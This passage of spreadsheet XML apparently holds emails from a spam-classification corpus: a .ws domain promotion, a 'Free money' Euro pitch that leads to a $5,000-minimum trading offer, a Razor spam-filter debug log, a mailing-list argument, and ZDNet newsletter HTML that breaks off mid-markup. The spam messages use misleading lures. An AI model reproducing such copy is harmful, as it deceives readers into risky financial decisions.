 * Availability for .ws is ~88% compared to ~24% for .com
 We thought you'd find the article on .ws below interesting. 
 If you want more information on where to register .ws "web site"
 domains, and how to get a discount on multiple registrations, 
 contact us at  http://www.netleads.ws/morgan
 Also, if you would like to increase traffic to your web site, 
 by submitting your URL to 500+ search engines and directories
 at once, then call us today.
 Sincerely,
 Joe &amp; Stacy Morgan
 +1.888.660.0625
 Internet Names, LLC.
 #########################
 NEWS RELEASE:
 .WS (WebSite) Domains Strikes Landmark Deal:
 GDI receives $2,250,860 for the rights to 311 "premium" .ws domain
 names.
 ---
 Last week, GDI (Global Domains International, Inc.), the registry for.ws
 "web site" domains, closed a deal with a large publicly traded company,
 one of the biggest players in the .com arena, and received payment in
 full of $2,250,860 for the rights to a select group of "premium" .ws
 domain names. The 311 domain names will be resold to the highest
 bidders and ultimately developed into substantial .ws web sites, giving
 .ws even more publicity down the road.
 To be be removed  http://www.netleads.ws/remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free money
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro:
 http://www.new-opps4u.com/eurocurrencyexchange/
 In addition to our currency report, you can receive:
 *  FREE trading software for commodities and currencies
 *  FREE online trading advice via email
 *  FREE trading system for stock and commodity traders
 Find out how the new Euro will affect you.  If
 you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world. CLICK NOW!
 http://www.new-opps4u.com/eurocurrencyexchange/
 $5,000 minimum investment
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 http://www.new-opps4u.com/TakeMeOff/ To OptOut
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] no positive razor hits?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 10 Sep 2002, Rose, Bobby wrote:
 &gt; Use the sample-spam.txt from Spamassassin and do a "razor-check -d &lt;
 &gt; sample-spam.txt"
 Interesting.  I just upgraded to razor-agents 2.14 yesterday, ran
 razor-admin -register.  I to am seeing that I'm not getting any positives
 from razor.  Including the sample-spam.txt's from spamassassin 2.41, 2.31,
 and 2.20.
 Any suggestions?  thanks.
 -d output below
 maxwell:/var/qmail/alias/gb-users%# razor-check -d &lt;
 /usr/local/src/Mail-SpamAssassin-2.20/sample-spam.txt
  Razor-Log: Computed razorhome from env: /root/.razor
  Razor-Log: Found razorhome: /root/.razor
  Razor-Log: No /root/.razor/razor-agent.conf found, skipping.
  Razor-Log: No razor-agent.conf found, using defaults. 
 Sep 12 12:04:13.785852 check[52238]: [ 1] [bootup] Logging initiated
 LogDebugLevel=9 to stdout
 Sep 12 12:04:13.787113 check[52238]: [ 5] computed razorhome=/root/.razor,
 conf=, ident=/root/.razor/identity-ruqVa5jbuS
 Sep 12 12:04:13.787442 check[52238]: [ 2]  Razor-Agents v2.14 starting
 razor-check -d
 Sep 12 12:04:13.789903 check[52238]: [ 9] uname -a: FreeBSD
 maxwell.gta.com 4.5-RELEASE-p3 FreeBSD 4.5-RELEASE-p3 #0: Wed May 22
 14:52:29 EDT 2002     root@maxwell.gta.com:/usr/src/sys/compile/maxwell
 i386
 Sep 12 12:04:13.790480 check[52238]: [ 8] reading straight RFC822 mail
 from &lt;stdin&gt;
 Sep 12 12:04:13.791397 check[52238]: [ 6] read 1 mail
 Sep 12 12:04:13.791917 check[52238]: [ 8] Client supported_engines: 1 2 3
 4
 Sep 12 12:04:13.792948 check[52238]: [ 8]  prep_mail done: mail 1
 headers=1432, mime0=3139
 Sep 12 12:04:13.793639 check[52238]: [ 6] skipping whitelist file
 (empty?): /root/.razor/razor-whitelist
 Sep 12 12:04:13.794295 check[52238]: [ 5] read_file: 1 items read from
 /root/.razor/servers.discovery.lst
 Sep 12 12:04:13.794871 check[52238]: [ 5] read_file: 1 items read from
 /root/.razor/servers.nomination.lst
 Sep 12 12:04:13.795382 check[52238]: [ 5] read_file: 3 items read from
 /root/.razor/servers.catalogue.lst
 Sep 12 12:04:13.796047 check[52238]: [ 9] Assigning defaults to
 honor.cloudmark.com
 Sep 12 12:04:13.796456 check[52238]: [ 9] Assigning defaults to
 apt.cloudmark.com
 Sep 12 12:04:13.796829 check[52238]: [ 9] Assigning defaults to
 fire.cloudmark.com
 Sep 12 12:04:13.797180 check[52238]: [ 9] Assigning defaults to
 truth.cloudmark.com
 Sep 12 12:04:13.798322 check[52238]: [ 5] read_file: 11 items read from
 /root/.razor/server.apt.cloudmark.com.conf
 Sep 12 12:04:13.799188 check[52238]: [ 5] read_file: 11 items read from
 /root/.razor/server.honor.cloudmark.com.conf
 Sep 12 12:04:13.799866 check[52238]: [ 5] 96778 seconds before closest
 server discovery
 Sep 12 12:04:13.800342 check[52238]: [ 6] apt.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0A
 Sep 12 12:04:13.800818 check[52238]: [ 8] Computed supported_engines: 2 4
 Sep 12 12:04:13.801167 check[52238]: [ 8] Using next closest server
 apt.cloudmark.com:2703, cached info srl 51
 Sep 12 12:04:13.801513 check[52238]: [ 8] mail 1 Subject: Home Based
 Business for Grownups
 Sep 12 12:04:13.805467 check[52238]: [ 6] preproc: mail 1.0 went from 3139
 bytes to 3100 
 Sep 12 12:04:13.805878 check[52238]: [ 6] computing sigs for mail 1.0, len
 3100
 Sep 12 12:04:13.809475 check[52238]: [ 5] Connecting to apt.cloudmark.com
 ...
 Sep 12 12:04:18.587441 check[52238]: [ 8] Connection established
 Sep 12 12:04:18.587929 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 29 server
 greeting: sn=C&amp;srl=51&amp;ep4=7542-10&amp;a=l
 Sep 12 12:04:18.588562 check[52238]: [ 6] apt.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0A
 Sep 12 12:04:18.589041 check[52238]: [ 8] Computed supported_engines: 2 4
 Sep 12 12:04:18.589432 check[52238]: [ 8] mail 1.0 e2
 sig: PGFfFte87P3Ve-CPTdu3NWgiBikA
 Sep 12 12:04:18.589751 check[52238]: [ 8] mail 1.0 e4
 sig: k6oGZsa1AvVolyvalWx2AACdWb8A
 Sep 12 12:04:18.590103 check[52238]: [ 8] preparing 2 queries
 Sep 12 12:04:18.590638 check[52238]: [ 8] sending 1 batches
 Sep 12 12:04:18.591087 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 96
 Sep 12 12:04:18.591324 check[52238]: [ 6]
 -a=c&amp;e=2&amp;s=PGFfFte87P3Ve-CPTdu3NWgiBikA
 a=c&amp;e=4&amp;ep4=7542-10&amp;s=k6oGZsa1AvVolyvalWx2AACdWb8A
 .
 Sep 12 12:04:19.270870 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 14
 Sep 12 12:04:19.271227 check[52238]: [ 6] response to sent.1
 -p=0
 p=0
 .
 Sep 12 12:04:19.272130 check[52238]: [ 6] mail 1.0 e=2
 sig=PGFfFte87P3Ve-CPTdu3NWgiBikA: sig not found.
 Sep 12 12:04:19.272449 check[52238]: [ 6] mail 1.0 e=4
 sig=k6oGZsa1AvVolyvalWx2AACdWb8A: sig not found.
 Sep 12 12:04:19.272760 check[52238]: [ 7] method 5: mail
 1.0: no-contention part, spam=0
 Sep 12 12:04:19.273012 check[52238]: [ 7] method 5: mail 1: a
 non-contention part not spam, mail not spam
 Sep 12 12:04:19.273257 check[52238]: [ 3] mail 1 is not known spam.
 Sep 12 12:04:19.273578 check[52238]: [ 5] disconnecting from server
 apt.cloudmark.com
 Sep 12 12:04:19.273982 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 5
 Sep 12 12:04:19.274203 check[52238]: [ 6] a=q
 Sep 12 12:04:19.274585 check[52238]: [ 8] razor-check finished
 successfully.
 ---
 david raistrick
 drais@atlasta.net		http://www.expita.com/nomime.html
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Joseph S. Barrera III wrote:
 &gt; Adam L. Beberg wrote:
 &gt; &gt; Fair use needs to be clarified a bit
 &gt;
 &gt; That's an understatement!!!
 Yes, it is :(
 &gt; &gt; How else do i ever have hope of finding a job working for someone
 &gt; &gt; that makes things people are supposed to ... *drumroll* pay for.
 &gt;
 &gt; Well, you could damn well get a fucking better attitude. I practically
 &gt; handed you a job the other week and you pissed all over me. I'm done
 &gt; helping you. You have joined a very exclusive club that up to now has
 &gt; only had my sister as a member.
 Forwarding me stuff from a list is hardly handing me a job. I tracked them
 down, they dont exist anymore, like 99% of the things I track down the req's
 are pulled or there is a freeze.
 The real problem is you cant even train for jobs now, since they _demand_
 7-10 years at a job paid to do the wierd collection of skills they want.
 But I'll get lucky eventually and someone I know will be a hiring manager.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you dream of the latest gadgets? (ZDNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 23, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nvTDQWgaJ4DWqFl2e5V_wCF-o9RR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDWLIG8PCwUn-Ndf0IoShq1mbRRR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6PkIlXxiM1GbpBdv5WAucH_CdRR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8jEIRrPLtYEz7Y8zPHKabgr-9RR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNgJIKBij03gZaL-LKA0KT2eK9RR" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahO1IP0zdbs6JGQ2aSHUUSaAIRRR" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Desktop systems&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=6f-3xY9IOL3YHJNPFa3CTAU3HipWRRR" &gt;&lt;B&gt;Gateway 700XL&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=84-CCDyQ60FVzmd3vMZw4wDZkfwURRR" &gt;Gateway $2,999&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=99-4mayQAdF8IRb5302xNVFrglRpdRR" &gt;&lt;B&gt;Dell Dimension 4000&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOB6QMB2EkcG26N8NLwHldSPksRR" &gt;Dell $739&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=c3-x1sCQJLHN_fnEofZvgPBXusLHsRR" &gt;&lt;B&gt;HP Pavilion 950&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=d8-XWY3QWLPz73szzimDY0NoxzqyRRR" &gt;CDW $599&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=ee-ZbxWQwDDxnh6jd50rgjJH8GWSdRR" &gt;&lt;B&gt;Alienware Aurora DDR&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=03-13a3I3rIIAI0mMuhJ_RvWe-dYsRR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=18-WhnzI987pTpswbpT6wKOqm3YC9RR" &gt;&lt;B&gt;Voodoo F-Class LE&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxXyIbKxNejDhZ-VMyxOkz0yr9RR" &gt;Gateway $445&lt;/A&gt; &lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=42-rFYcIPKGJxYmQ3LpIN961yozdRRR" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Any technojunkie worth his or her salt salivates at the mere 
 thought of having the latest and greatest gizmos. After all, 
 it's all about who has bragging rights of owning the hottest 
 toys. So whether you're a gadget newbie or a hardened 
 technophile, there's sure to be something that you'll love 
 in our picks for the best gadgets around. 
 &lt;P&gt;
 &lt;table&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/9946796_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=57-YJKXII0aTxUVbwAFncakvs_5IdRR" &gt;&lt;B&gt;Handspring Treo 90&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $268
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/ce/ps/120/9625806_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUp3IuP88f71rwGKrtJ4XBeDPdRR" &gt;&lt;B&gt;Creative Labs Nomad Jukebox 3&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $345
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/ce/ps/120/8737557_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;
 &lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1KaQ-KpQ9k9x2vp7Wcy5daZUdRR" &gt;&lt;B&gt;Fujifilm FinePix 30i&lt;/b&gt;&lt;/a&gt;
 &lt;li&gt;Lowest price: $245
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/9789407_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=96-pjnWQtdhdsjMy1ujUf1uaoeG0sRR" &gt;&lt;B&gt;Toshiba Pocket PC e310 &lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $328
 &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/table&gt;
 	Check out our complete list of &lt;a href="http://clickthru.online.com/Click?q=ac-RbItQ0UJoLswptudPW2MJSYDkRRR" &gt;&lt;B&gt;must-have gadgets&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=c1-PIFjQpW7Byc13UNw6InCs84UHRRR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/561958.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=d6-yw3KQMPMW0msSHdngOc0g6m4VsRR" &gt;&lt;B&gt;Samsung SyncMaster 950b&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;The SyncMaster 950b's low price, good graphics, and above-average
 geometry make it an excellent choice for budget-conscious homes
 and offices.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=eb-HlLoQkDTzTDV2PddmaU0iF3n9sRR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=00-4FXlI9QDBo_NPBebO4ljuPvLY9RR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=15-mYZ_IGcDlozCnwhAyAwsPZj2qRRR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/561836.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=2a-CNeWIrIWzvptsf2aYL_IQQFNjRRR" &gt;&lt;B&gt;Samsung ML-1430&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;The ML-1430 combines fast print speeds with great output quality--and
 a price that budget users can afford. Its lack of expandability restricts 
 this laser printer to student, home, or small-office use, though.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=3f-4s1EIqMPa5fkZyAHXEw4CNnfcdRR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=54-l6HvIZK3CE6BS-P0gRM52dVtIsRR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/84x74_50k.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_20IeW6ZkFR9cozXPX934YcERRR" &gt;&lt;B&gt;$50K-a-day Giveaway from Dell Home Systems&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 Buy any Dell Home System on or before July 31, 2002 and you&amp;#8217;ll 
 be automatically entered to win $50,000! No purchase necessary 
 to win.&lt;br&gt;&lt;/td&gt;
 &lt;!--  &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/84x74_systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=7f-bnCKIIPiqDjGuSI9zI5MotJxZdRR" &gt;A friendly reminder from Dell Home Systems&lt;/A&gt;&lt;br&gt;Buy a select new Dell Home System and get your Memory Upgraded 
 for free. Hurry! Offer ends soon.&lt;br&gt;&lt;/td&gt; 		  
 &lt;!--&lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
